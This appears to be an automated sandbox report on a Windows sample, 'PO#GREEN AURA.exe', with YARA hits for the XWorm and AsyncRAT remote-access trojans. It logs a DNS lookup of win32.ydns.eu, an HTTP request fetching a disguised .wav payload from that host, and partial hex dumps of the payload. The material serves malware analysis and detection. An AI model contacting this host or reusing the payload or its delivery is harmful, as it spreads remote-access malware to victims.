                              Mar 6, 2025 07:06:15.270447969 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270462036 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270482063 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270514965 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270524979 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270550013 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270582914 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270591974 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270617962 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270653009 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270665884 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270685911 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270720005 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270730019 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270755053 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270787954 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270797968 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270823002 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270855904 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270865917 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270893097 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270941973 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.270950079 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.270977020 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.271018028 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.271048069 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.271083117 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.271117926 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.271127939 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.271152973 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.271188974 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.271197081 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.271897078 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.272717953 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.272773027 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.272797108 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.272828102 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.272862911 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.272876024 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.272897005 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.272931099 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.272942066 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.272965908 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.273011923 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.361785889 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.361902952 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.361975908 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.362004995 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362056017 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362090111 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362122059 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.362123966 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362176895 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362195015 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.362211943 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362257957 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.362263918 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362298012 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362330914 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362358093 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.362380981 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362416029 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362426043 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.362452030 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362485886 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362494946 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.362520933 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362554073 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362570047 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.362588882 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362622976 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362642050 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.362658024 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362692118 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362725973 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362745047 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.362759113 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362777948 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.362797976 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362832069 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362849951 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.362865925 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362899065 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.362915039 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.362977028 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.363012075 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.363028049 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.363045931 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.363078117 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.363094091 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:15.363114119 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:15.363162041 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:20.851706982 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:20.851787090 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:28.345211029 CET4973380192.168.2.445.144.214.104
                              TimestampSource PortDest PortSource IPDest IP
                              Mar 6, 2025 07:06:13.340841055 CET5721453192.168.2.41.1.1.1
                              Mar 6, 2025 07:06:13.355356932 CET53572141.1.1.1192.168.2.4
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Mar 6, 2025 07:06:13.340841055 CET192.168.2.41.1.1.10xe5e7Standard query (0)win32.ydns.euA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Mar 6, 2025 07:06:13.355356932 CET1.1.1.1192.168.2.40xe5e7No error (0)win32.ydns.eu45.144.214.104A (IP address)IN (0x0001)false
                              • win32.ydns.eu
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.44973345.144.214.104802136C:\Users\user\Desktop\PO#GREEN AURA.exe
                              TimestampBytes transferredDirectionData
                              Mar 6, 2025 07:06:13.369082928 CET93OUTGET /1/12/panel/uploads/Xlzsats.wav HTTP/1.1
                              Host: win32.ydns.eu
                              Connection: Keep-Alive
                              Mar 6, 2025 07:06:14.195303917 CET1236INHTTP/1.1 200 OK
                              Date: Thu, 06 Mar 2025 06:06:14 GMT
                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                              Last-Modified: Thu, 06 Mar 2025 05:27:56 GMT
                              ETag: "fa008-62fa5c4b0fd37"
                              Accept-Ranges: bytes
                              Content-Length: 1024008
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: audio/x-wav
                              Data Raw: 19 02 bf 4e 6d e7 2a 70 36 9a d1 67 58 8b da f0 54 d8 33 5d da 8e e9 ca 43 e0 63 a0 5b 22 f8 ba 0c e1 b5 48 60 f1 b3 ba 9f 3d 95 e0 7b 05 f8 45 6d 49 79 a1 c0 17 dd 92 8e ad 3c 79 9e 5c 8d 37 39 a6 9a ac 36 dc d9 e1 0b bf 13 3e 14 e1 31 17 fb 75 8f a5 32 7f 9d 52 3a 29 78 25 f2 c5 49 d3 2e 55 79 6e 70 0e 73 00 1b 00 0f f8 69 81 6f 82 f0 3d 02 d3 29 49 1b 93 7c ab 89 f1 03 30 72 a8 cd 1f 3b d3 55 09 99 51 c6 e5 c2 c4 2b 13 bb 86 ad b5 ed 20 37 3d db 0a 1e a4 6c 92 e4 e0 f8 fd 1c ce 70 a3 62 f6 f8 86 0d 38 82 84 49 5c fb 6c 84 78 b6 18 5b 90 be 14 4a 39 59 99 d8 d9 65 9b de bf 34 27 f4 1e 06 eb d7 f8 c8 a5 8e 3c 94 99 f3 f8 21 0b 83 f0 dd 51 a0 45 41 83 78 37 fb 4e 67 fc 7e 42 73 7d c7 d5 48 98 bd cb 34 a0 8d 8b 2b 89 6b 1f 74 63 59 9e 52 11 f3 a8 33 3e d4 9b ef 94 65 1f 6e 8f ae c2 11 e9 19 45 be 88 54 12 ba b3 c2 a1 37 52 bd c2 17 ee 2e ba 80 55 1b a7 83 2a 74 0c d1 0b 80 e7 15 71 38 84 87 ab 39 a8 f4 a7 af 95 8d 7e f9 92 89 b1 f0 0f f5 47 98 2f 6d e9 3f a7 5a 37 41 07 d6 87 6e b2 70 3d ce 8d fa be [TRUNCATED]
                              Data Ascii: Nm*p6gXT3]Cc["H`={EmIy<y\796>1u2R:)x%I.Uynpsio=)I|0r;UQ+ 7=lpb8I\lx[J9Ye4'<!QEAx7Ng~Bs}H4+ktcYR3>enET7R.U*tq89~G/m?Z7Anp=@p7v#dn=2hl&C>9-eSr|&x!Y^52*PR[ZNRPZmMYWfr(M*59$nsQEbI4N?h^X~i3Ulx',O kVTwqE-euk}<}z7)FOp<~J"ek*k6;,9cWC8?7#*@,&!#j~M(]nrBo*PYv#?IIgE2M$s|BM>:WY8MLO2XZ0XV>."ZZ/c"O)zpdHWo,{K3X-*=Elv]1WG-X*&(2$[GvQUs'D-"6)VXZb;k
                              Mar 6, 2025 07:06:14.195379019 CET1236INData Raw: cd 54 c4 42 2e 84 13 8b 19 89 e3 61 25 a9 ff fe 1d ee ea 78 62 6d 92 c2 07 d9 04 d7 fd e3 86 ae ed 8e 31 46 e3 79 1a 37 e1 7f 95 97 e2 f3 29 19 29 57 a0 e2 9f 5d 17 5a ff f1 6d 87 d8 ed a7 25 0d 6f e9 e6 b2 8f f6 e7 8b c9 c1 6b 33 ea 5d 7a 85 ab
                              Data Ascii: TB.a%xbm1Fy7))W]Zm%ok3]zS[6j,122KTgC[:.}%;X$9GN\t$=}Q3Z3"%@1amE3Y~+Vx@aC\nH#rFUaJSO|$-h|;ri
                              Mar 6, 2025 07:06:14.195400000 CET448INData Raw: 2d 2f 3e fe 62 84 6b a7 b2 d5 e3 c4 82 12 09 ec 2d 61 87 42 75 9d 1a 27 8d b6 b0 57 d3 11 d2 75 f0 d4 1f e2 f2 32 24 0d 42 25 ff c8 a2 95 47 5d 1c 96 f9 5a 95 1a 73 72 c6 b8 c1 d7 80 f6 cd d0 f3 ee bd 05 90 5c c6 7e a8 5f 34 db c5 1b 5a c8 fd 2a
                              Data Ascii: -/>bk-aBu'Wu2$B%G]Zsr\~_4Z*>n\}eKkmAAt?\QVx~XV9HA[6T/PjOF;}mPVx*nX[$t})lW"> Q9E(&k4M"
                              Mar 6, 2025 07:06:14.195417881 CET1236INData Raw: 67 60 0e ab e0 2b e3 63 c2 03 c6 b5 dc 82 72 b0 68 23 f8 2a 98 2c b7 9b 42 46 3d e7 54 2b 0b a2 a9 90 83 64 0a 6f b1 1b 46 4c 49 8e 88 85 06 e9 4a ad ab 12 09 d6 f4 1b 7f eb 63 7d 71 de 22 50 35 49 98 da d3 ca a7 7d fb f1 1b e3 50 42 a6 70 9e 1b
                              Data Ascii: g`+crh#*,BF=T+doFLIJc}q"P5I}PBpY#U'hJvoi{Z'OdO4);*jowG;./f'HpTRqYUnwln3eZAP3`s!.hCKW^K8^m>
                              Mar 6, 2025 07:06:14.195456982 CET1236INData Raw: 16 79 21 5f c1 32 57 26 76 67 c0 a4 76 4f c8 79 da 32 25 8e da 37 29 54 f2 6c 23 89 28 18 5a 2a 9f 90 45 bf 64 d4 d7 86 2d a2 15 e1 f6 e5 68 90 64 8d 3a 7f 5c 87 30 6c 2f 7c af 55 36 c4 29 3f fd 94 8a 49 f5 24 6d cc 00 ad f9 e0 fb 11 a6 97 5f c7
                              Data Ascii: y!_2W&vgvOy2%7)Tl#(Z*Ed-hd:\0l/|U6)?I$m_XsfD/Z=Ihl6Z%tFVa+FYdu3D)=4p(t7U7;mI8\s3ni{4S,]b=3
                              Mar 6, 2025 07:06:14.195492983 CET1236INData Raw: 1e e8 46 ef d8 04 9f dd 04 32 8e 57 0b 47 63 15 75 1f 88 fd 38 3f 00 26 21 91 bc ba 93 ad 97 83 c6 1a 33 74 07 4e d5 53 00 a5 e3 93 ce 8d 8d 7f 6d 99 64 8c cc 46 38 09 83 39 1f e4 cb 12 6d ac 31 82 9e 3f 45 4f 0f 08 b7 6e f7 12 cb ad fb bb aa bc
                              Data Ascii: F2WGcu8?&!3tNSmdF89m1?EOnQ8tjV(ai-!t>%`1#NkZ^RhV\YLcm!c*t|VJU}~2lCD#p?@R#_5-.x9<,'gk
                              Mar 6, 2025 07:06:14.195529938 CET1236INData Raw: 20 f2 13 1f 5e c0 de f9 f5 ca c6 2f 88 be e1 74 dd cc b9 1d ca 8a 5d fe fa 2a 66 59 3e 43 91 f6 00 c0 19 35 aa 6b 9a 73 8e 5e 10 2b 10 7d 33 d4 84 e6 24 9a 20 5b ab 57 e8 8d 78 10 47 ea 06 eb 10 f8 16 41 57 fa af a2 41 86 9e 62 9f 40 14 78 df 45
                              Data Ascii: ^/t]*fY>C5ks^+}3$ [WxGAWAb@xEkA;7}\6b]6nQ?{zKv 7/AzojM3'e(`[-usl5PX+a7(mFyp^$9TAr(*D!xi7C
                              Mar 6, 2025 07:06:14.195564985 CET328INData Raw: 9c 19 20 ed 28 f7 89 84 ec c2 29 ef 19 0e cf e8 17 e1 c0 d3 c6 65 7f cc 53 ca 8e b3 20 b6 c9 e5 05 37 c5 48 e4 58 a3 54 20 c3 31 85 6b 09 70 8b 2f d3 2d 9a 66 42 7c 16 44 32 9c e1 f7 ff f6 bc a0 f7 46 cd 99 a5 76 ad a6 eb 8b 3b 80 de 3d 85 98 69
                              Data Ascii: ()eS 7HXT 1kp/-fB|D2Fv;=i{!Ilcptrf{[X+RMW{ *&}A9aGhkR;OinB1AbG_!A?mBW`WwjSX_WvX=++o]=`
                              Mar 6, 2025 07:06:14.195601940 CET1236INData Raw: c1 78 d5 ad 4d 6c ed bc 24 9f 69 2d 01 87 63 8c f6 28 ba 6e 96 3c 4e 93 81 ed 97 3e e7 8c 85 96 88 d0 60 d2 f7 b2 26 be 24 28 dc 2a b1 8f 77 07 09 57 5a 5d fa e6 10 61 f2 6c 7e 9e aa b7 2b 2e d6 83 f3 ba d8 df 59 6d 2b d1 4d fa 0b 7d eb 5b 04 6b
                              Data Ascii: xMl$i-c(n<N>`&$(*wWZ]al~+.Ym+M}[ke(`"HZQ1,w7Zo)}B~[3rhijn8Io~O_l<n=zG)C&v1VR5oH~0=#yJgJ2Fg
                              Mar 6, 2025 07:06:14.195640087 CET1236INData Raw: c4 1a d1 71 b8 ec 1f b5 33 6d 53 4e dc c6 c3 1f a8 6a a4 52 68 43 5d da 7e 51 16 89 92 a2 ab 36 da d3 79 a4 99 92 0d 1a 83 43 df b2 5d 96 01 05 9a 2d c1 78 2d 83 f4 3f db 45 d1 57 61 48 35 1b 12 5f 0b 8d 73 a7 1c a7 41 2e 6b 8e 82 e5 9c 63 52 a0
                              Data Ascii: q3mSNjRhC]~Q6yC]-x-?EWaH5_sA.kcRquCg9EN1``qT2mki,gKi7'eUw_S(Sl)H5>"WNy5x|^nfW#"07B9OV~)Fna
                              Mar 6, 2025 07:06:14.200850964 CET1236INData Raw: 9e a2 c7 ac cd d2 09 63 eb ab 63 39 74 b8 f7 96 6c 59 dc ae d7 cd 8c 4b eb c5 79 0d 61 4b d8 e9 25 0e d2 e0 1f a2 e0 6f 63 da 44 0b 4e 78 69 45 bf e6 2a 17 61 00 97 44 39 88 4f a9 fd 82 fa 48 b4 bb 5e e8 b4 50 6f 9e 02 1c a0 78 65 49 25 a2 5f ca
                              Data Ascii: cc9tlYKyaK%ocDNxiE*aD9OH^PoxeI%_0fu[3Vi9}ra{N@N91yNoKB<8`"n*QYrui`clp=Y&/Q\Pm2v!\Ci0@v8}gF#4 J2[m8:


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:01:06:11
                              Start date:06/03/2025
                              Path:C:\Users\user\Desktop\PO#GREEN AURA.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\PO#GREEN AURA.exe"
                              Imagebase:0xfd0000
                              File size:105'984 bytes
                              MD5 hash:71E0C8F71B15046709D4E250086346A4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1842730771.0000000006580000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:01:06:25
                              Start date:06/03/2025
                              Path:C:\Users\user\Desktop\PO#GREEN AURA.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\PO#GREEN AURA.exe"
                              Imagebase:0x540000
                              File size:105'984 bytes
                              MD5 hash:71E0C8F71B15046709D4E250086346A4
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:false

                              Target ID:5
                              Start time:01:06:29
                              Start date:06/03/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 928
                              Imagebase:0x130000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Reset < >